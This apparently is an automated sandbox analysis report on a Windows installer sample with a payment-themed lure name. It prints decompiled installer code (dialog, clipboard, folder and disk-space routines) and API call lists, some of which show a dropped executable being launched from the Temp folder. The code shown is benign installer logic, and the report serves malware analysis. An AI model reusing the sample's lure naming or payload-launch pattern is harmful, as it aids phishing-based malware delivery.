                                                                                  						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                  					}
                                                                                  					if(_a8 != 0x111) {
                                                                                  						L17:
                                                                                  						_t171 = 1;
                                                                                  						if(_a8 != 0x404) {
                                                                                  							L25:
                                                                                  							if(_a8 != 0x7b) {
                                                                                  								goto L20;
                                                                                  							}
                                                                                  							_t94 = _v8;
                                                                                  							if(_a12 != _t94) {
                                                                                  								goto L20;
                                                                                  							}
                                                                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                  							_a8 = _t95;
                                                                                  							if(_t95 <= _t156) {
                                                                                  								L36:
                                                                                  								return 0;
                                                                                  							}
                                                                                  							_t164 = CreatePopupMenu();
                                                                                  							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                  							_t100 = _a16;
                                                                                  							_t159 = _a16 >> 0x10;
                                                                                  							if(_a16 == 0xffffffff) {
                                                                                  								GetWindowRect(_v8,  &_v28);
                                                                                  								_t100 = _v28.left;
                                                                                  								_t159 = _v28.top;
                                                                                  							}
                                                                                  							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                  								_v60 = _t156;
                                                                                  								_v48 = 0x423748;
                                                                                  								_v44 = 0x1000;
                                                                                  								_a4 = _a8;
                                                                                  								do {
                                                                                  									_a4 = _a4 - 1;
                                                                                  									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                  								} while (_a4 != _t156);
                                                                                  								OpenClipboard(_t156);
                                                                                  								EmptyClipboard();
                                                                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                  								_a4 = _t108;
                                                                                  								_t172 = GlobalLock(_t108);
                                                                                  								do {
                                                                                  									_v48 = _t172;
                                                                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                  									 *_t173 = 0xd;
                                                                                  									_t175 = _t173 + 2;
                                                                                  									 *_t175 = 0xa;
                                                                                  									_t172 = _t175 + 2;
                                                                                  									_t156 = _t156 + 1;
                                                                                  								} while (_t156 < _a8);
                                                                                  								GlobalUnlock(_a4);
                                                                                  								SetClipboardData(0xd, _a4);
                                                                                  								CloseClipboard();
                                                                                  							}
                                                                                  							goto L36;
                                                                                  						}
                                                                                  						if( *0x42922c == _t156) {
                                                                                  							ShowWindow( *0x42a268, 8);
                                                                                  							if( *0x42a2ec == _t156) {
                                                                                  								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                                                  							}
                                                                                  							E0040459D(_t171);
                                                                                  							goto L25;
                                                                                  						}
                                                                                  						 *0x421f18 = 2;
                                                                                  						E0040459D(0x78);
                                                                                  						goto L20;
                                                                                  					} else {
                                                                                  						if(_a12 != 0x403) {
                                                                                  							L20:
                                                                                  							return E0040462B(_a8, _a12, _a16);
                                                                                  						}
                                                                                  						ShowWindow( *0x429230, _t156);
                                                                                  						ShowWindow(_t169, 8);
                                                                                  						E004045F9(_t169);
                                                                                  						goto L17;
                                                                                  					}
                                                                                  				}
                                                                                  				_v52 = _v52 | 0xffffffff;
                                                                                  				_v40 = _v40 | 0xffffffff;
                                                                                  				_t177 = 2;
                                                                                  				_v60 = _t177;
                                                                                  				_v56 = 0;
                                                                                  				_v48 = 0;
                                                                                  				_v44 = 0;
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				_t130 =  *0x42a270;
                                                                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                  				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                                                  				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                  				 *0x429244 = _t134;
                                                                                  				_v8 = _t134;
                                                                                  				E004045F9( *0x429230);
                                                                                  				 *0x429234 = E00404F52(4);
                                                                                  				 *0x42924c = 0;
                                                                                  				GetClientRect(_v8,  &_v28);
                                                                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                  				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                                  				if(_a8 >= 0) {
                                                                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                  				}
                                                                                  				if(_a12 >= _t156) {
                                                                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                  				}
                                                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                  				_push(0x1b);
                                                                                  				E004045C4(_a4);
                                                                                  				if(( *0x42a278 & 0x00000003) != 0) {
                                                                                  					ShowWindow( *0x429230, _t156);
                                                                                  					if(( *0x42a278 & 0x00000002) != 0) {
                                                                                  						 *0x429230 = _t156;
                                                                                  					} else {
                                                                                  						ShowWindow(_v8, 8);
                                                                                  					}
                                                                                  					E004045F9( *0x429228);
                                                                                  				}
                                                                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                  				if(( *0x42a278 & 0x00000004) != 0) {
                                                                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                  				}
                                                                                  				goto L36;
                                                                                  			}

































                                                                                  0x00405811
                                                                                  0x00405817
                                                                                  0x00405821
                                                                                  0x00405824
                                                                                  0x004059ba
                                                                                  0x004059de
                                                                                  0x004059de
                                                                                  0x004059f1
                                                                                  0x00405a0f
                                                                                  0x00405a11
                                                                                  0x00405a19
                                                                                  0x00405a6f
                                                                                  0x00405a73
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405a75
                                                                                  0x00405a7b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405a85
                                                                                  0x00405a8d
                                                                                  0x00405a90
                                                                                  0x00405b92
                                                                                  0x00000000
                                                                                  0x00405b92
                                                                                  0x00405a9f
                                                                                  0x00405aaa
                                                                                  0x00405ab3
                                                                                  0x00405abe
                                                                                  0x00405ac1
                                                                                  0x00405aca
                                                                                  0x00405ad0
                                                                                  0x00405ad3
                                                                                  0x00405ad3
                                                                                  0x00405aeb
                                                                                  0x00405af4
                                                                                  0x00405af7
                                                                                  0x00405afe
                                                                                  0x00405b05
                                                                                  0x00405b0d
                                                                                  0x00405b0d
                                                                                  0x00405b24
                                                                                  0x00405b24
                                                                                  0x00405b2b
                                                                                  0x00405b31
                                                                                  0x00405b3d
                                                                                  0x00405b44
                                                                                  0x00405b4d
                                                                                  0x00405b4f
                                                                                  0x00405b52
                                                                                  0x00405b61
                                                                                  0x00405b64
                                                                                  0x00405b6a
                                                                                  0x00405b6b
                                                                                  0x00405b71
                                                                                  0x00405b72
                                                                                  0x00405b73
                                                                                  0x00405b7b
                                                                                  0x00405b86
                                                                                  0x00405b8c
                                                                                  0x00405b8c
                                                                                  0x00000000
                                                                                  0x00405aeb
                                                                                  0x00405a21
                                                                                  0x00405a51
                                                                                  0x00405a59
                                                                                  0x00405a64
                                                                                  0x00405a64
                                                                                  0x00405a6a
                                                                                  0x00000000
                                                                                  0x00405a6a
                                                                                  0x00405a25
                                                                                  0x00405a2f
                                                                                  0x00000000
                                                                                  0x004059f3
                                                                                  0x004059f9
                                                                                  0x00405a34
                                                                                  0x00000000
                                                                                  0x00405a3d
                                                                                  0x00405a02
                                                                                  0x00405a07
                                                                                  0x00405a0a
                                                                                  0x00000000
                                                                                  0x00405a0a
                                                                                  0x004059f1
                                                                                  0x0040582a
                                                                                  0x0040582e
                                                                                  0x00405836
                                                                                  0x0040583a
                                                                                  0x0040583d
                                                                                  0x00405840
                                                                                  0x00405843
                                                                                  0x00405846
                                                                                  0x00405847
                                                                                  0x00405848
                                                                                  0x00405861
                                                                                  0x00405864
                                                                                  0x0040586e
                                                                                  0x0040587d
                                                                                  0x00405885
                                                                                  0x0040588d
                                                                                  0x00405892
                                                                                  0x00405895
                                                                                  0x004058a1
                                                                                  0x004058aa
                                                                                  0x004058b3
                                                                                  0x004058d5
                                                                                  0x004058db
                                                                                  0x004058ec
                                                                                  0x004058f1
                                                                                  0x004058ff
                                                                                  0x0040590d
                                                                                  0x0040590d
                                                                                  0x00405912
                                                                                  0x00405920
                                                                                  0x00405920
                                                                                  0x00405925
                                                                                  0x00405928
                                                                                  0x0040592d
                                                                                  0x00405939
                                                                                  0x00405942
                                                                                  0x0040594f
                                                                                  0x0040595e
                                                                                  0x00405951
                                                                                  0x00405956
                                                                                  0x00405956
                                                                                  0x0040596a
                                                                                  0x0040596a
                                                                                  0x0040597e
                                                                                  0x00405987
                                                                                  0x00405990
                                                                                  0x004059a0
                                                                                  0x004059ac
                                                                                  0x004059ac
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetDlgItem.USER32 ref: 00405867
                                                                                  • GetDlgItem.USER32 ref: 00405876
                                                                                  • GetClientRect.USER32 ref: 004058B3
                                                                                  • GetSystemMetrics.USER32 ref: 004058BA
                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                  • GetDlgItem.USER32 ref: 00405977
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                  • GetDlgItem.USER32 ref: 00405885
                                                                                    • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                  • GetDlgItem.USER32 ref: 004059C9
                                                                                  • CreateThread.KERNEL32 ref: 004059D7
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                                  • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                  • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                  • CreatePopupMenu.USER32 ref: 00405A96
                                                                                  • AppendMenuW.USER32 ref: 00405AAA
                                                                                  • GetWindowRect.USER32 ref: 00405ACA
                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                  • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                  • EmptyClipboard.USER32 ref: 00405B31
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                  • GlobalLock.KERNEL32 ref: 00405B47
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                  • SetClipboardData.USER32 ref: 00405B86
                                                                                  • CloseClipboard.USER32 ref: 00405B8C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                  • String ID: H7B${
                                                                                  • API String ID: 590372296-2256286769
                                                                                  • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                  • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                  • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                                  • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				long _v16;
                                                                                  				long _v20;
                                                                                  				long _v24;
                                                                                  				char _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				long _v36;
                                                                                  				char _v40;
                                                                                  				unsigned int _v44;
                                                                                  				signed int _v48;
                                                                                  				WCHAR* _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				intOrPtr _v68;
                                                                                  				WCHAR* _v72;
                                                                                  				void _v76;
                                                                                  				struct HWND__* _v80;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t82;
                                                                                  				long _t87;
                                                                                  				short* _t89;
                                                                                  				void* _t95;
                                                                                  				signed int _t96;
                                                                                  				int _t109;
                                                                                  				signed short _t114;
                                                                                  				signed int _t118;
                                                                                  				struct HWND__** _t122;
                                                                                  				intOrPtr* _t138;
                                                                                  				WCHAR* _t146;
                                                                                  				unsigned int _t150;
                                                                                  				signed int _t152;
                                                                                  				unsigned int _t156;
                                                                                  				signed int _t158;
                                                                                  				signed int* _t159;
                                                                                  				signed int* _t160;
                                                                                  				struct HWND__* _t166;
                                                                                  				struct HWND__* _t167;
                                                                                  				int _t169;
                                                                                  				unsigned int _t197;
                                                                                  
                                                                                  				_t156 = __edx;
                                                                                  				_t82 =  *0x422720;
                                                                                  				_v32 = _t82;
                                                                                  				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                  				if(_a8 == 0x40b) {
                                                                                  					E00405CAC(0x3fb, _t146);
                                                                                  					E004068EF(_t146);
                                                                                  				}
                                                                                  				_t167 = _a4;
                                                                                  				if(_a8 != 0x110) {
                                                                                  					L8:
                                                                                  					if(_a8 != 0x111) {
                                                                                  						L20:
                                                                                  						if(_a8 == 0x40f) {
                                                                                  							L22:
                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                  							_v12 = _v12 & 0x00000000;
                                                                                  							E00405CAC(0x3fb, _t146);
                                                                                  							if(E0040603F(_t186, _t146) == 0) {
                                                                                  								_v8 = 1;
                                                                                  							}
                                                                                  							E00406668(0x421718, _t146);
                                                                                  							_t87 = E00406A35(1);
                                                                                  							_v16 = _t87;
                                                                                  							if(_t87 == 0) {
                                                                                  								L30:
                                                                                  								E00406668(0x421718, _t146);
                                                                                  								_t89 = E00405FE2(0x421718);
                                                                                  								_t158 = 0;
                                                                                  								if(_t89 != 0) {
                                                                                  									 *_t89 = 0;
                                                                                  								}
                                                                                  								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                  									goto L35;
                                                                                  								} else {
                                                                                  									_t169 = 0x400;
                                                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                  									asm("cdq");
                                                                                  									_v48 = _t109;
                                                                                  									_v44 = _t156;
                                                                                  									_v12 = 1;
                                                                                  									goto L36;
                                                                                  								}
                                                                                  							} else {
                                                                                  								_t159 = 0;
                                                                                  								if(0 == 0x421718) {
                                                                                  									goto L30;
                                                                                  								} else {
                                                                                  									goto L26;
                                                                                  								}
                                                                                  								while(1) {
                                                                                  									L26:
                                                                                  									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                                                  									if(_t114 != 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									if(_t159 != 0) {
                                                                                  										 *_t159 =  *_t159 & _t114;
                                                                                  									}
                                                                                  									_t160 = E00405F83(0x421718);
                                                                                  									 *_t160 =  *_t160 & 0x00000000;
                                                                                  									_t159 = _t160;
                                                                                  									 *_t159 = 0x5c;
                                                                                  									if(_t159 != 0x421718) {
                                                                                  										continue;
                                                                                  									} else {
                                                                                  										goto L30;
                                                                                  									}
                                                                                  								}
                                                                                  								_t150 = _v44;
                                                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                  								_v44 = _t150 >> 0xa;
                                                                                  								_v12 = 1;
                                                                                  								_t158 = 0;
                                                                                  								__eflags = 0;
                                                                                  								L35:
                                                                                  								_t169 = 0x400;
                                                                                  								L36:
                                                                                  								_t95 = E00404F52(5);
                                                                                  								if(_v12 != _t158) {
                                                                                  									_t197 = _v44;
                                                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                  										_v8 = 2;
                                                                                  									}
                                                                                  								}
                                                                                  								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                                                  									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                                                  									if(_v12 == _t158) {
                                                                                  										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                                                  									} else {
                                                                                  										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                                                  									}
                                                                                  								}
                                                                                  								_t96 = _v8;
                                                                                  								 *0x42a304 = _t96;
                                                                                  								if(_t96 == _t158) {
                                                                                  									_v8 = E0040140B(7);
                                                                                  								}
                                                                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                  									_v8 = _t158;
                                                                                  								}
                                                                                  								E004045E6(0 | _v8 == _t158);
                                                                                  								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                                                  									E00404A0E();
                                                                                  								}
                                                                                  								 *0x423738 = _t158;
                                                                                  								goto L53;
                                                                                  							}
                                                                                  						}
                                                                                  						_t186 = _a8 - 0x405;
                                                                                  						if(_a8 != 0x405) {
                                                                                  							goto L53;
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  					_t118 = _a12 & 0x0000ffff;
                                                                                  					if(_t118 != 0x3fb) {
                                                                                  						L12:
                                                                                  						if(_t118 == 0x3e9) {
                                                                                  							_t152 = 7;
                                                                                  							memset( &_v76, 0, _t152 << 2);
                                                                                  							_v80 = _t167;
                                                                                  							_v72 = 0x423748;
                                                                                  							_v60 = E00404E0B;
                                                                                  							_v56 = _t146;
                                                                                  							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                                  							_t122 =  &_v80;
                                                                                  							_v64 = 0x41;
                                                                                  							__imp__SHBrowseForFolderW(_t122);
                                                                                  							if(_t122 == 0) {
                                                                                  								_a8 = 0x40f;
                                                                                  							} else {
                                                                                  								__imp__CoTaskMemFree(_t122);
                                                                                  								E00405F37(_t146);
                                                                                  								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                                                  								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
                                                                                  									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                                                  									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                                  										lstrcatW(_t146, 0x428200);
                                                                                  									}
                                                                                  								}
                                                                                  								 *0x423738 =  *0x423738 + 1;
                                                                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                  							}
                                                                                  						}
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					if(_a12 >> 0x10 != 0x300) {
                                                                                  						goto L53;
                                                                                  					}
                                                                                  					_a8 = 0x40f;
                                                                                  					goto L12;
                                                                                  				} else {
                                                                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                  					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                                                  						E00405F37(_t146);
                                                                                  					}
                                                                                  					 *0x429238 = _t167;
                                                                                  					SetWindowTextW(_t166, _t146);
                                                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                  					_push(1);
                                                                                  					E004045C4(_t167);
                                                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                  					_push(0x14);
                                                                                  					E004045C4(_t167);
                                                                                  					E004045F9(_t166);
                                                                                  					_t138 = E00406A35(8);
                                                                                  					if(_t138 == 0) {
                                                                                  						L53:
                                                                                  						return E0040462B(_a8, _a12, _a16);
                                                                                  					} else {
                                                                                  						 *_t138(_t166, 1);
                                                                                  						goto L8;
                                                                                  					}
                                                                                  				}
                                                                                  			}













































                                                                                  0x00404ab5
                                                                                  0x00404abb
                                                                                  0x00404ac1
                                                                                  0x00404ace
                                                                                  0x00404adc
                                                                                  0x00404adf
                                                                                  0x00404ae7
                                                                                  0x00404aed
                                                                                  0x00404aed
                                                                                  0x00404af9
                                                                                  0x00404afc
                                                                                  0x00404b6a
                                                                                  0x00404b71
                                                                                  0x00404c48
                                                                                  0x00404c4f
                                                                                  0x00404c5e
                                                                                  0x00404c5e
                                                                                  0x00404c62
                                                                                  0x00404c6c
                                                                                  0x00404c79
                                                                                  0x00404c7b
                                                                                  0x00404c7b
                                                                                  0x00404c89
                                                                                  0x00404c90
                                                                                  0x00404c97
                                                                                  0x00404c9a
                                                                                  0x00404cd6
                                                                                  0x00404cd8
                                                                                  0x00404cde
                                                                                  0x00404ce3
                                                                                  0x00404ce7
                                                                                  0x00404ce9
                                                                                  0x00404ce9
                                                                                  0x00404d05
                                                                                  0x00000000
                                                                                  0x00404d07
                                                                                  0x00404d0a
                                                                                  0x00404d18
                                                                                  0x00404d1e
                                                                                  0x00404d1f
                                                                                  0x00404d22
                                                                                  0x00404d25
                                                                                  0x00000000
                                                                                  0x00404d25
                                                                                  0x00404c9c
                                                                                  0x00404c9e
                                                                                  0x00404ca2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404ca4
                                                                                  0x00404ca4
                                                                                  0x00404cb1
                                                                                  0x00404cb6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404cba
                                                                                  0x00404cbc
                                                                                  0x00404cbc
                                                                                  0x00404cc5
                                                                                  0x00404cc7
                                                                                  0x00404ccc
                                                                                  0x00404ccf
                                                                                  0x00404cd4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404cd4
                                                                                  0x00404d31
                                                                                  0x00404d3b
                                                                                  0x00404d3e
                                                                                  0x00404d41
                                                                                  0x00404d48
                                                                                  0x00404d48
                                                                                  0x00404d4a
                                                                                  0x00404d4a
                                                                                  0x00404d4f
                                                                                  0x00404d51
                                                                                  0x00404d59
                                                                                  0x00404d60
                                                                                  0x00404d62
                                                                                  0x00404d6d
                                                                                  0x00404d6d
                                                                                  0x00404d62
                                                                                  0x00404d7d
                                                                                  0x00404d87
                                                                                  0x00404d8f
                                                                                  0x00404daa
                                                                                  0x00404d91
                                                                                  0x00404d9a
                                                                                  0x00404d9a
                                                                                  0x00404d8f
                                                                                  0x00404daf
                                                                                  0x00404db4
                                                                                  0x00404db9
                                                                                  0x00404dc2
                                                                                  0x00404dc2
                                                                                  0x00404dcb
                                                                                  0x00404dcd
                                                                                  0x00404dcd
                                                                                  0x00404dd9
                                                                                  0x00404de1
                                                                                  0x00404deb
                                                                                  0x00404deb
                                                                                  0x00404df0
                                                                                  0x00000000
                                                                                  0x00404df0
                                                                                  0x00404c9a
                                                                                  0x00404c51
                                                                                  0x00404c58
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404c58
                                                                                  0x00404b77
                                                                                  0x00404b80
                                                                                  0x00404b9a
                                                                                  0x00404b9f
                                                                                  0x00404ba9
                                                                                  0x00404bb0
                                                                                  0x00404bbc
                                                                                  0x00404bbf
                                                                                  0x00404bc2
                                                                                  0x00404bc9
                                                                                  0x00404bd1
                                                                                  0x00404bd4
                                                                                  0x00404bd8
                                                                                  0x00404bdf
                                                                                  0x00404be7
                                                                                  0x00404c41
                                                                                  0x00404be9
                                                                                  0x00404bea
                                                                                  0x00404bf1
                                                                                  0x00404bfb
                                                                                  0x00404c03
                                                                                  0x00404c10
                                                                                  0x00404c24
                                                                                  0x00404c28
                                                                                  0x00404c28
                                                                                  0x00404c24
                                                                                  0x00404c2d
                                                                                  0x00404c3a
                                                                                  0x00404c3a
                                                                                  0x00404be7
                                                                                  0x00000000
                                                                                  0x00404b9f
                                                                                  0x00404b8d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404b93
                                                                                  0x00000000
                                                                                  0x00404afe
                                                                                  0x00404b0b
                                                                                  0x00404b14
                                                                                  0x00404b21
                                                                                  0x00404b21
                                                                                  0x00404b28
                                                                                  0x00404b2e
                                                                                  0x00404b37
                                                                                  0x00404b3a
                                                                                  0x00404b3d
                                                                                  0x00404b45
                                                                                  0x00404b48
                                                                                  0x00404b4b
                                                                                  0x00404b51
                                                                                  0x00404b58
                                                                                  0x00404b5f
                                                                                  0x00404df6
                                                                                  0x00404e08
                                                                                  0x00404b65
                                                                                  0x00404b68
                                                                                  0x00000000
                                                                                  0x00404b68
                                                                                  0x00404b5f

                                                                                  APIs
                                                                                  • GetDlgItem.USER32 ref: 00404B04
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                  • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00423748,00000000,?,?), ref: 00404C1C
                                                                                  • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v), ref: 00404C28
                                                                                  • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                                    • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                    • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                    • Part of subcall function 004068EF: CharPrevW.USER32(?,?,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                  • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                    • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                    • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                    • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
